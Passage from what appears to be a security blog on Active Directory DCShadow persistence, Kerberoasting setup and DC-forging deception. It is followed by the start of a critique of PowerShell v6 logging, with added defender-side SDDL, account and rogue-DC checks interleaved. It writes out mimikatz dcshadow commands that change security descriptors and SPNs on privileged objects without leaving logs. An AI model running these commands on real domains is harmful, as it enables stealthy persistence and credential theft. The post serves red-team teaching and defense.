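A defender-side check that ties together the SDDL walkthrough from the RACE post above (the <b>S:PAI(AU;CIFA;DT;;;WD)</b> auditing entry) and the DCShadow permission fragments just listed, as an added example that is not code from either post or from Nishang: a small SDDL parser plus checks that flag the replication extended rights on the domain object, CreateChild/DeleteChild on CN=Sites and a full-control ACE on AdminSDHolder granted to unexpected trustees, and that report whether a SACL still audits successful attribute writes. The expected-trustee set, the baseline SACL and the domain/Sites descriptors are constructed assumptions; the GUIDs and SIDs are the ones that appear in the post.

```python
# Offline checks over AD security descriptors exported as SDDL (for example with
# Get-Acl 'AD:\...' -Audit as shown in the post).  Added example; samples are labelled.
import re
from collections import namedtuple

# Extended rights DCShadow needs on the domain object (GUIDs as listed in the post).
DCSHADOW_RIGHTS = {
    "9923a32a-3607-11d2-b9be-0000f87a36b2": "DS-Install-Replica",
    "1131f6ac-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Manage-Topology",
    "1131f6ab-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Synchronize",
}
# Trustees that may legitimately hold these rights or full control (assumption: tune per
# forest).  ED = Enterprise Domain Controllers; the -519 SID is the lab forest's
# Enterprise Admins group as it appears in the post's AdminSDHolder SDDL.
EXPECTED_TRUSTEES = {"SY", "BA", "DA", "EA", "ED",
                     "S-1-5-21-3270384115-3177237293-604223748-519"}
LAB_USER = "S-1-5-21-3270384115-3177237293-604223748-2111"   # the user SID from the post
ACE_RE = re.compile(r"\(([^)]*)\)")
# (type;flags;rights;object_guid;inherit_guid;trustee) -- the six fields of a plain ACE
Ace = namedtuple("Ace", "ace_type flags rights object_guid inherit_guid trustee")

def codes(s: str) -> set:
    """Split a rights/flags string into its two-letter codes.  'LCRPLORC' is
    {LC, RP, LO, RC}; a substring test would wrongly find 'CR' straddling LC|RP."""
    return {s} if s.startswith("0x") else {s[i:i + 2] for i in range(0, len(s), 2)}

def _parse_acl(body: str):
    """'flags(ace)(ace)...' -> (flags, [Ace, ...]); conditional ACEs are not handled."""
    first = body.find("(")
    aces = [Ace(*m.group(1).split(";")) for m in ACE_RE.finditer(body)]
    return (body if first < 0 else body[:first]), aces

def parse_sddl(sddl: str) -> dict:
    """Parse 'O:..G:..D:flags(ace)..S:flags(ace)..'; no other SDDL token contains ':'."""
    sd = {"owner": "", "group": "", "dacl_flags": "", "dacl": [], "sacl_flags": "", "sacl": []}
    markers = list(re.finditer(r"[OGDS]:", sddl))
    for i, m in enumerate(markers):
        end = markers[i + 1].start() if i + 1 < len(markers) else len(sddl)
        body, key = sddl[m.end():end], m.group()[0]
        if key in "OG":
            sd["owner" if key == "O" else "group"] = body
        else:
            acl = "dacl" if key == "D" else "sacl"
            sd[acl + "_flags"], sd[acl] = _parse_acl(body)
    return sd

def dcshadow_grants(sd: dict, where: str, expected=EXPECTED_TRUSTEES) -> list:
    """Allow ACEs handing a DCShadow prerequisite to a trustee outside 'expected'.
    where='domain': the three replication extended rights (or blanket CR / GA);
    where='sites' : CreateChild+DeleteChild under CN=Sites (fake DC registration)."""
    found = []
    for ace in sd["dacl"]:
        if ace.ace_type not in ("A", "OA") or ace.trustee in expected:
            continue
        rights, guid = codes(ace.rights), ace.object_guid.lower()
        if where == "domain" and ace.ace_type == "OA" and "CR" in rights and guid in DCSHADOW_RIGHTS:
            found.append(f"{ace.trustee}: {DCSHADOW_RIGHTS[guid]}")
        elif where == "domain" and ace.ace_type == "A" and rights & {"CR", "GA"}:
            found.append(f"{ace.trustee}: all extended rights")
        elif where == "sites" and ace.ace_type == "A" and ({"CC", "DC"} <= rights or "GA" in rights):
            found.append(f"{ace.trustee}: CreateChild+DeleteChild on Sites")
    return found

def full_control_grants(sd: dict, expected=EXPECTED_TRUSTEES) -> list:
    """Trustees outside 'expected' holding WriteDACL/WriteOwner/GenericAll, like the
    ACE the post appends to AdminSDHolder."""
    return [f"{a.trustee}: {a.rights}" for a in sd["dacl"] if a.ace_type == "A"
            and a.trustee not in expected and codes(a.rights) & {"WD", "WO", "GA"}]

def audit_coverage(sd: dict) -> dict:
    """What the SACL still records.  A success audit of WP (write property) is what
    would log an attribute push; the post's 'S:PAI(AU;CIFA;DT;;;WD)' keeps none."""
    success = [a for a in sd["sacl"] if "SA" in codes(a.flags)]
    return {"inheritance_blocked": "P" in sd["sacl_flags"],
            "success_entries": len(success),
            "failure_entries": sum("FA" in codes(a.flags) for a in sd["sacl"]),
            "writes_audited": any(codes(a.rights) & {"WP", "GW", "GA"} for a in success)}

# Samples.  SACL_BEFORE, DOMAIN_SDDL and SITES_SDDL are constructed; SACL_AFTER is the
# post's entry and ADMINSDHOLDER_DACL is the post's SDDL trimmed to its plain Allow ACEs.
SACL_BEFORE = "S:AI(OU;CISA;WP;;;WD)"
SACL_AFTER = "S:PAI(AU;CIFA;DT;;;WD)"
ADMINSDHOLDER_DACL = ("O:DAG:DAD:PAI(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)"
                      "(A;;CCDCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPLOCRRCWDWO;;;DA)"
                      "(A;;CCDCLCSWRPWPLOCRRCWDWO;;;S-1-5-21-3270384115-3177237293-604223748-519)"
                      f"(A;;CCDCLCSWRPWPLOCRSDRCWDWO;;;{LAB_USER})")
DOMAIN_SDDL = ("O:DAG:DAD:AI(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)"
               f"(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;{LAB_USER})"
               f"(OA;;CR;9923a32a-3607-11d2-b9be-0000f87a36b2;;{LAB_USER})"
               f"(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;{LAB_USER})")
SITES_SDDL = f"O:EAG:EAD:AI(A;CI;CCDC;;;{LAB_USER})"

def run_checks() -> dict:
    """Run every check over the samples and return the findings."""
    return {"domain": dcshadow_grants(parse_sddl(DOMAIN_SDDL), "domain"),
            "sites": dcshadow_grants(parse_sddl(SITES_SDDL), "sites"),
            "adminsdholder": full_control_grants(parse_sddl(ADMINSDHOLDER_DACL)),
            "audit_before": audit_coverage(parse_sddl(SACL_BEFORE)),
            "audit_after": audit_coverage(parse_sddl(SACL_AFTER))}
```

Feed the SDDL strings returned by Get-Acl (with -Audit for the SACL) into parse_sddl and compare audit_coverage against a recorded baseline; run_checks() shows the expected findings over the samples.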
<div style="text-align: justify;">
Use the below mimikatz commands to set DCShadow permissions which can be used only from a particular computer, as a specific user, against a specific object - all of them specified in the commands. Please do not get intimidated by the long commands; I have used exactly the same method as for AdminSDHolder - copy the existing SDDL and append your own.</div>
<pre><textarea cols="70" readonly="readonly" rows="5" style="background-color: black; color: white;">lsadump::dcshadow /stack /object:DC=offensiveps,DC=com /attribute:ntSecurityDescriptor /value:"Existing SDDL + Permissions for YourUserSID"
lsadump::dcshadow /stack /object:ops-user12$ /attribute:ntSecurityDescriptor /value:"Existing SDDL + Permissions for YourUserSID"
lsadump::dcshadow /stack /object:helpdeskuser /attribute:ntSecurityDescriptor /value:"Existing SDDL + Permissions for YourUserSID"
lsadump::dcshadow /stack /object:CN=Sites,CN=Configuration,DC=offensiveps,DC=com /attribute:ntSecurityDescriptor /value:"Existing SDDL + Permissions for YourUserSID"
lsadump::dcshadow
</textarea></pre>
<div style="text-align: justify;">
This is sweet! Now, if we maintain access to the computer and the user specified above, it is possible to modify the attributes of the specified object without leaving logs.<br />
<br /></div>
<div style="text-align: justify;">
</div>
</div>
<div style="text-align: justify;">
<b>Setting SPNs on Admin Accounts for Kerberoasting</b></div>
<div style="text-align: justify;">
As explained by Sean <a href="https://adsecurity.org/?p=3466">here</a>, in this technique we forcibly set SPNs on admin accounts for later Kerberoasting. Kerberoasting, for those of you who are unaware, is an attack technique where a TGS (Ticket Granting Service) ticket is requested for an SPN, saved to disk and then brute-forced offline for the password of the target SPN's service account. Thus, if we can set an SPN for a privileged account, it is possible to brute-force its password in clear-text using Kerberoasting. To set SPNs on a privileged account we need high privileges, hence this is a persistence technique. The below command can be used to set the SPN of a DA account using DCShadow:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: black; color: white;">mimikatz # lsadump::dcshadow /object:tempda /attribute:servicePrincipalName /value:"DCReplication/DC"
</textarea></pre>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
In addition to the above, you can find your own attacks. For example, I have not discussed setting TrustedForDelegation and TrustedToAuthForDelegation :) Go through the list of all AD attributes and find more interesting ones - <a href="https://msdn.microsoft.com/en-us/library/ms675090(v=vs.85).aspx">https://msdn.microsoft.com/en-us/library/ms675090(v=vs.85).aspx</a></div>
<div style="text-align: justify;">
<br />
<b>Defense</b><br />
For defense, see <a href="http://dcshadow.com/">dcshadow.com</a> and <a href="https://github.com/AlsidOfficial/UncoverDCShadow">UnCoverDCShadow</a>. And limit the number of DAs and usage of DA credentials across your enterprise ;) A very good reference is <a href="https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material">Securing Privileged Access Reference Material</a>.</div>
<div style="text-align: justify;">
<h3>
DCShadow for Blue Team Deception</h3>
</div>
<div style="text-align: justify;">
For the past couple of months, I have been working a lot on using deception for defense. I like Active Directory deception because of its efficacy in providing alerts and increasing (at least) the time costs for an adversary. While I will leave the details for another post and/or talk, one thing I found difficult when forging objects which are interesting to an attacker is editing some of the attributes of an object. For example, it is not easy to forge a computer object to make it look like a DC object. Multiple attributes and services must be set before a computer object "appears" to be a DC. There are some workarounds, but that calls for another post or, as I said, a talk. So, DCShadow helps with forging a domain controller which looks more real. Of course, there is a lot of scope for improvement, but I really like how it opens up opportunities for blue teams.<br />
<br />
A quick example: suppose we want to make the member computer object "ops-user12" look like a DC. We can use the following (make sure you either have DA privileges or have set permissions using Set-DCShadowPermissions):<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: black; color: white;">mimikatz # lsadump::dcshadow /object:ops-user12$ /attribute:primaryGroupID /value:516</textarea></pre>
Push the above<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: black; color: white;">mimikatz # lsadump::dcshadow /object:ops-user12$ /attribute:userAccountControl /value:532480</textarea></pre>
Push the above<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: black; color: white;">mimikatz # lsadump::dcshadow /manualregister</textarea></pre>
Use the above from mimikatz instance running as DA or modified permissions. Now, if an adversary enumerates your domain, this is what it looks like:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFpcADt8PAu3AX0066zBCLPg73nLguPtttVvQmZJFgRLtEmSB1AmUl2ysP6Iv_eO3XLO9g6pARX2iaoCo1CGkZ6AdMxinUe5EL4PAuMCrPMwvR-woOWAeQHXEnHWTjrTU5WdistP0Hq0w/s1600/Deception_net.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="729" data-original-width="1343" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFpcADt8PAu3AX0066zBCLPg73nLguPtttVvQmZJFgRLtEmSB1AmUl2ysP6Iv_eO3XLO9g6pARX2iaoCo1CGkZ6AdMxinUe5EL4PAuMCrPMwvR-woOWAeQHXEnHWTjrTU5WdistP0Hq0w/s400/Deception_net.png" width="400" /></a></div>
And this holds true for most of the red team tools (like PowerView which uses the .NET class in above screenshot) and even most of the WMI classes for domain enumeration like Win32_NTDomain and ds_computer of the directory\ldap namespace.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitK1UrfTy3M5vT9HDyxuNfd_5CVnYeS6wWaxwv0ePZL53fLjhjYVvXh0einVxBfRc0hgqE10o8J5-WEDK7PG8aQymOxto0094TMCavstoZKFUKQwG2MXiT1POtL2evy0JQ4T8TMVpIpSw/s1600/Deception_WMI.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="864" data-original-width="1355" height="255" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitK1UrfTy3M5vT9HDyxuNfd_5CVnYeS6wWaxwv0ePZL53fLjhjYVvXh0einVxBfRc0hgqE10o8J5-WEDK7PG8aQymOxto0094TMCavstoZKFUKQwG2MXiT1POtL2evy0JQ4T8TMVpIpSw/s400/Deception_WMI.png" width="400" /></a></div>
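The attribute changes this post demonstrates (a privileged primaryGroupID or SIDHistory, an SPN on an admin account, and a member computer given userAccountControl 532480 and primaryGroupID 516 so that it looks like a DC) leave footprints in the objects themselves. The check below, an added example and not the post's or Nishang's code, reviews exported account records for those footprints; the Account class, the known-DC list and the records are constructed to mirror the lab objects named in the post.

```python
# Review exported AD account records for the attribute-level footprints this post
# demonstrates.  Added example, not code from the post or from Nishang; the Account
# class, the known-DC list and all records below are constructed to mirror the lab.
from dataclasses import dataclass, field

# Well-known RIDs of groups whose membership should never appear via primaryGroupID
# or sIDHistory on an ordinary account.
PRIVILEGED_RIDS = {512: "Domain Admins", 516: "Domain Controllers",
                   518: "Schema Admins", 519: "Enterprise Admins"}
DEFAULT_PRIMARY_GROUP = {"user": 513, "computer": 515}  # Domain Users / Domain Computers
SERVER_TRUST_ACCOUNT = 0x2000      # userAccountControl bit carried by a DC
TRUSTED_FOR_DELEGATION = 0x80000   # 0x82000 == 532480, the value pushed in the post


@dataclass
class Account:
    name: str
    kind: str                      # "user" or "computer"
    primary_group_id: int
    user_account_control: int = 0
    sid_history: list = field(default_factory=list)
    spns: list = field(default_factory=list)
    admin_count: int = 0


def rid(sid: str) -> int:
    """Relative identifier (last component) of a SID string."""
    return int(sid.rsplit("-", 1)[1])


def review(accounts, known_dcs) -> list:
    """Return (account name, reason) pairs worth an analyst's attention."""
    findings = []
    for a in accounts:
        pg = a.primary_group_id
        # primaryGroupID membership is not stored in the group's member attribute, so
        # enumeration that reads 'member' (PowerView, per the post) does not show it.
        if pg != DEFAULT_PRIMARY_GROUP[a.kind] and pg in PRIVILEGED_RIDS and a.name not in known_dcs:
            findings.append((a.name, f"primaryGroupID {pg} = {PRIVILEGED_RIDS[pg]}"))
        for sid in a.sid_history:
            if rid(sid) in PRIVILEGED_RIDS:
                findings.append((a.name, f"sIDHistory carries {PRIVILEGED_RIDS[rid(sid)]} ({sid})"))
        # adminCount=1 accounts (AdminSDHolder-protected) with an SPN can be Kerberoasted.
        if a.admin_count == 1 and a.spns:
            findings.append((a.name, "privileged account has SPN(s): " + ", ".join(a.spns)))
        # A computer claiming to be a DC that is not on the known-DC list.
        if a.kind == "computer" and a.user_account_control & SERVER_TRUST_ACCOUNT and a.name not in known_dcs:
            findings.append((a.name, f"SERVER_TRUST_ACCOUNT set (userAccountControl {a.user_account_control:#x})"))
    return findings


# Constructed records mirroring the post's lab objects.
KNOWN_DCS = {"dc01$"}
SAMPLE_ACCOUNTS = [
    Account("helpdeskuser", "user", 519,
            sid_history=["S-1-5-21-3270384115-3177237293-604223748-519"]),
    Account("tempda", "user", 513, admin_count=1, spns=["DCReplication/DC"]),
    Account("ops-user12$", "computer", 516,
            user_account_control=SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION),
    Account("dc01$", "computer", 516,
            user_account_control=SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION),
    Account("labuser", "user", 513),
]

if __name__ == "__main__":
    for name, reason in review(SAMPLE_ACCOUNTS, KNOWN_DCS):
        print(f"{name}: {reason}")
```

Over the sample records this reports helpdeskuser twice, tempda once and ops-user12$ twice, while the listed DC and the plain user produce nothing.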
But this is still very experimental. We can easily notice attributes missing from the fake DC, although those can be set. The thing which concerns me right now is whether this breaks any authentication requests or other legitimate functionality. When using the "push" option of DCShadow, the registration and unregistration take place quickly, but when we do it manually, what if some legitimate authentication requests are directed to the fake DC? I am hoping to find an answer to that soon. <br />
<br />
I hope this use of DCShadow for deception triggers a community effort on using AD objects for deception :)<br />
<br />
<b>Problems </b><br />
Some of the problems you may face while using DCShadow:<br />
<br />
<b>Insufficient Privileges</b><br />
ERROR kuhl_m_lsadump_dcshadow_force_sync_partition ; IDL_DRSReplicaAdd<br />
DC=whatever,DC=com 0x80090322 (2148074274)<br />
<br />
If you get an error like the one above, make sure that mimikatz is running as SYSTEM (use !processtoken). Please refer to the Executing DCShadow section above. <br />
<br />
<b>Permission Errors</b><br />
If you see an error like "Unable to add object via ldap" during registration, make sure that you are "pushing" with DA privileges from mimikatz or that you have set the proper permissions. <br />
<br />
In some cases, when unregistration fails (see the video!), you may have to clean up the object created under CN=Servers in the Configuration container and/or the SPNs of the computer object which was registered as the fake DC. To reset the SPNs I am using this simple command from the ActiveDirectory module.<br />
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: #012456; color: white;">PS C:\> Set-ADComputer -ServicePrincipalNames $null -Identity ops-user12
PS C:\> Set-ADComputer -ServicePrincipalNames @{Add="WSMAN/ops-user12","WSMAN/ops-user12.offensiveps.com","TERMSRV/OPS-USER12","TERMSRV/ops-user12.offensiveps.com","RestrictedKrbHost/OPS-USER12","HOST/OPS-USER12","RestrictedKrbHost/ops-user12.offensiveps.com","HOST/ops-user12.offensiveps.com"} -Identity ops-user12</textarea></pre>
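A defender-side check for exactly the leftovers described above, added here as an example and not part of the original post or of the DCShadow tooling: it lists every NTDS Settings object under CN=Servers in the Configuration container and flags any server that is not a real domain controller, then looks for non-DC computer objects carrying DC-style SPNs. It assumes the ActiveDirectory module and a domain-joined session; the replication service SPN class GUID used in the second check is general AD knowledge, not a value taken from this post.<br />

```powershell
# Added example, not from the original post: spot the artifacts a fake DC leaves
# behind (an nTDSDSA object under CN=Servers, DC-only SPNs on a member computer)
# so an incomplete DCShadow unregistration, yours or an attacker's, is caught.
Import-Module ActiveDirectory

# Replication service SPN class that real DCs carry (well-known AD constant, not from the post).
$DrsSpnClass = 'E3514235-4B06-11D1-AB04-00C04FC2DCD2'

function Get-KnownDcNames {
    # Real DCs as the domain knows them; names uppercased for case-insensitive comparison.
    (Get-ADDomainController -Filter *).Name | ForEach-Object { $_.ToUpperInvariant() }
}

function Get-RogueDcServerObjects {
    # Every NTDS Settings object in the Configuration container should belong to a real DC.
    $realDcs  = @(Get-KnownDcNames)
    $configNC = (Get-ADRootDSE).configurationNamingContext
    Get-ADObject -SearchBase $configNC -LDAPFilter '(objectClass=nTDSDSA)' |
        ForEach-Object {
            # DN looks like CN=NTDS Settings,CN=<server>,CN=Servers,CN=<site>,CN=Sites,...
            $serverCn = ($_.DistinguishedName -split ',')[1] -replace '^CN=', ''
            [pscustomobject]@{
                Server    = $serverCn
                IsKnownDC = ($realDcs -contains $serverCn.ToUpperInvariant())
                ObjectDN  = $_.DistinguishedName
            }
        } | Where-Object { -not $_.IsKnownDC }
}

function Get-ComputersWithDcSpns {
    # A normal member computer (see the SPN reset above) carries HOST, RestrictedKrbHost,
    # TERMSRV and WSMAN SPNs; a GC/ or replication-class SPN on a non-DC is a strong indicator.
    $realDcs = @(Get-KnownDcNames)
    Get-ADComputer -Filter * -Properties servicePrincipalName |
        Where-Object { $realDcs -notcontains $_.Name.ToUpperInvariant() } |
        ForEach-Object {
            $bad = @($_.servicePrincipalName | Where-Object {
                $_ -like 'GC/*' -or $_ -like "$DrsSpnClass/*"
            })
            if ($bad.Count -gt 0) {
                [pscustomobject]@{ Computer = $_.Name; SuspiciousSPNs = ($bad -join '; ') }
            }
        }
}

Get-RogueDcServerObjects | Format-Table -AutoSize
Get-ComputersWithDcSpns  | Format-Table -AutoSize
```

Both functions return nothing on a clean domain, so they are cheap to run from a scheduled task and alert on any output; the first catches the server object, the second the SPNs, since either may survive a failed unregistration on its own.<br />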
Here is a video showing the above attacks and deception.</div>
<iframe allow="autoplay; encrypted-media" allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/YLMCeAZk1Ro?rel=0" width="560"></iframe><br />
<br />
Hope you enjoyed the post!<br />
<br />
<br /></div>
Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com0tag:blogger.com,1999:blog-8135211063584500909.post-88567353188673499182018-01-14T23:01:00.000+05:302018-01-25T09:38:44.445+05:30A Critique of Logging Capabilities in PowerShell v6<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
PowerShell 6 <a href="https://blogs.msdn.microsoft.com/powershell/2018/01/10/powershell-core-6-0-generally-available-ga-and-supported/">was released</a> a couple of days back. PowerShell v6 is the Core version, that is, it is open source and cross platform, and it is NOT Windows PowerShell, which continues to be the default one on Windows. As per <a href="https://blogs.msdn.microsoft.com/powershell/2017/07/14/powershell-6-0-roadmap-coreclr-backwards-compatibility-and-more/">this blog</a> by the PowerShell Team, going forward, PowerShell Core is the future (Windows PowerShell will still get critical bug-fixes.)</div>
<div style="text-align: justify;">
The PowerShell Team, over the past 2-3 years, has constantly improved the security controls in PowerShell. The defining moment was, of course, <a href="https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/">PowerShell ♥ the Blue Team</a>, where the PowerShell Team detailed many interesting features like System-wide Transcription, Deep Script Block Logging, AntiMalware Scan Interface, Protected Event Logging, Constrained Language Mode (with Applocker "Allow" mode) etc. Comparing PowerShell v2 - which comes installed by default on Windows 7 - with PowerShell 5.1, the default on Windows 10, the effort to restrict, track and log PowerShell usage on a box is clearly visible and effective. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Having used PowerShell for 7+ years for red team assessments and penetration tests, I look forward to every major release of PowerShell to change and upgrade my techniques and methodologies. With PowerShell 5.1, as an attacker, I am actually afraid that whatever I do on a foothold or launchpad box may be logged and (hopefully) monitored. During my Offensive PowerShell and Active Directory training, the attendees who are industry practitioners and researchers, always appreciate the logging capabilities of PowerShell and try to implement them in their organization's networks.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
But with PowerShell v6, the logging features have been drastically reduced! This is almost certainly because v6 is based on .NET Core, but there has been no authoritative word about it. This post compares the most interesting logging capabilities of PowerShell v6 with those of Windows PowerShell 5.1.</div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
Deployment</h3>
<div style="text-align: justify;">
All the enhanced logging capabilities PowerShell has can be deployed using Group Policy. But this doesn't hold true for v6! To enable whatever logging v6 does have, a script, RegisterManifest.ps1 (found in the $PSHOME directory), needs to be executed on each machine to register the PowerShellCore event provider (PowerShell remoting can be used to run this script at scale). Thanks Satoshi for <a href="https://twitter.com/standa_t/status/951468256560164864">pointing this out</a>. <br />
<br />
Logging configured from Group Policy is much easier to manage and harder to tamper with, whereas the PowerShellCore event provider can be unregistered by using the "-UnRegister" parameter of the same script.</div>
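Before comparing the two versions feature by feature, here is a quick way to see which of these controls a given host actually has in place. It is an added example (not from the post and not a PowerShell Team script) that reads the Group Policy registry values behind script block logging, module logging and transcription for Windows PowerShell 5.1, and checks whether the PowerShellCore event log exists, which is what RegisterManifest.ps1 sets up. The log name PowerShellCore/Operational and the registry paths are as found on a 5.1 / 6.0 test host; treat them as assumptions if your build differs.<br />

```powershell
# Added example, not from the original post: audit which of the PowerShell
# logging controls discussed here are in effect on this host. Run elevated
# in Windows PowerShell 5.1.

function Get-PSLoggingPolicy {
    # Policy values written by the "Turn on PowerShell Script Block Logging",
    # "Turn on Module Logging" and "Turn on PowerShell Transcription" GPO settings.
    $base   = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
    $checks = @(
        @{ Control = 'Script block logging'; Key = "$base\ScriptBlockLogging"; Flag = 'EnableScriptBlockLogging' }
        @{ Control = 'Module logging';       Key = "$base\ModuleLogging";      Flag = 'EnableModuleLogging' }
        @{ Control = 'Transcription';        Key = "$base\Transcription";      Flag = 'EnableTranscripting' }
    )
    foreach ($c in $checks) {
        $enabled = $false
        $detail  = 'policy key absent'
        if (Test-Path $c.Key) {
            $item    = Get-ItemProperty -Path $c.Key
            $enabled = ($item.($c.Flag) -eq 1)
            # Transcription without OutputDirectory lands in each user's "My Documents".
            $detail  = if ($c.Control -eq 'Transcription' -and $item.OutputDirectory) {
                "transcripts in $($item.OutputDirectory)"
            } else { 'policy key present' }
        }
        [pscustomobject]@{ Control = $c.Control; Enabled = $enabled; Detail = $detail }
    }
}

function Test-PSCoreProviderRegistered {
    # RegisterManifest.ps1 registers the PowerShellCore ETW provider and its
    # Applications and Services log; without it Core writes no events at all.
    # Assumption: the log is named PowerShellCore/Operational as on the test host.
    $log = Get-WinEvent -ListLog 'PowerShellCore/Operational' -ErrorAction SilentlyContinue
    [pscustomobject]@{
        Control = 'PowerShellCore event provider'
        Enabled = [bool]$log
        Detail  = if ($log) { $log.LogFilePath } else { 'not registered (run $PSHOME\RegisterManifest.ps1 from pwsh)' }
    }
}

Get-PSLoggingPolicy
Test-PSCoreProviderRegistered
```

The Group Policy rows answer "is 5.1 covered"; the last row answers "is 6 covered at all", and because that registration is per machine and reversible with -UnRegister, it is the one worth re-checking on a schedule rather than trusting once.<br />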
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
System-wide Transcription</h3>
<div style="text-align: justify;">
When system-wide transcription is enabled, all the activity of every PowerShell host (powershell.exe, powershell_ise.exe, System.Management.Automation.dll or any other custom host) is logged to the specified directory, or to the user's "My Documents" directory if none is specified. With proper implementation, that is, forwarding the transcripts to secure storage and correlating them, system-wide transcription can be very effective in detecting PowerShell attacks. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
This is how system-wide transcription looks for PowerShell 5.1 (the execution is using InstallUtil):</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPr__wnqguL1wv7vXzNTP8tt-xV-8x2Po3YOHJWJrg26U-MvI2n-hT4mhDOqvrBgEBF9S9lBmKPxr6EblqVLV9GLVfPkwem-LhnhbHa0oSx0xjUGHY6HuNKB_Lmppv_aZFyzbCnZA7kJY/s1600/transcription.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="815" data-original-width="982" height="331" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPr__wnqguL1wv7vXzNTP8tt-xV-8x2Po3YOHJWJrg26U-MvI2n-hT4mhDOqvrBgEBF9S9lBmKPxr6EblqVLV9GLVfPkwem-LhnhbHa0oSx0xjUGHY6HuNKB_Lmppv_aZFyzbCnZA7kJY/s400/transcription.png" width="400" /></a></div>
<div style="text-align: justify;">
PowerShell v6 does not support system-wide transcription.</div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
Script Block Logging</h3>
<div style="text-align: justify;">
PowerShell v5.1 has two types of script block logging: Warning level automatic logging and Verbose logging, which must be configured. Warning level automatic logging records known bad/suspicious commands and script blocks in the Microsoft-Windows-PowerShell/Operational log as Event ID 4104 at Warning level. When Verbose logging is turned on, which can be done using Group Policy, PowerShell commands are logged as Event ID 4104 at Verbose level. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAsIqhuWUlqkt7ci_tbzXevLiCj3R-IvJw7PAX25rzJBr0nDuncpOxCB9_3C2XCcFeFBrpZgvFRSGZ4ii9rMQYAOlzB7WQawETdoEk_xAJ8_psoAmYmyfrBNkk6Mye858lLg9Yrh6XwFI/s1600/Logging.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="392" data-original-width="1320" height="118" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAsIqhuWUlqkt7ci_tbzXevLiCj3R-IvJw7PAX25rzJBr0nDuncpOxCB9_3C2XCcFeFBrpZgvFRSGZ4ii9rMQYAOlzB7WQawETdoEk_xAJ8_psoAmYmyfrBNkk6Mye858lLg9Yrh6XwFI/s400/Logging.png" width="400" /></a></div>
<div style="text-align: justify;">
Yes, there are public bypasses for script block logging, as blogged by Ryan Cobb <a href="https://cobbr.io/ScriptBlock-Warning-Event-Logging-Bypass.html">here</a> and <a href="https://cobbr.io/ScriptBlock-Logging-Bypass.html">here</a>; still, it increases the attacker's costs.<br />
<br />
PowerShell v6 has no automatic script block logging. But when the PowerShellCore provider is registered, the suspicious script blocks are logged with Event ID 4103 in the PowerShellCore log.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhncgJluRXTgF_mgRECFv8BF2htubQol343YjCN_yy1rH-7ptzLGxkG5yvVoEIxoMk1M12jSBPnwnFM6eYlyctekYMROEzWg-FrzDjz7ZVunilPUWWVeZMbH-0fzcdijWjk4yMbvnzTOcw/s1600/v6_logging.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="443" data-original-width="664" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhncgJluRXTgF_mgRECFv8BF2htubQol343YjCN_yy1rH-7ptzLGxkG5yvVoEIxoMk1M12jSBPnwnFM6eYlyctekYMROEzWg-FrzDjz7ZVunilPUWWVeZMbH-0fzcdijWjk4yMbvnzTOcw/s400/v6_logging.png" width="400" /></a></div>
Interestingly, while testing the warning level logs, I found out that v6 does better than v5.1 and logs fewer false positives. For example, one of the suspicious strings (see <a href="https://github.com/PowerShell/PowerShell/blob/v6.0.0/src/System.Management.Automation/engine/runtime/CompiledScriptBlock.cs#L1516-L1652">code here</a>), "GetMembers", is logged by 5.1 even if it is just typed on its own without doing anything.<br />
<div class="separator" style="clear: both; text-align: center;">
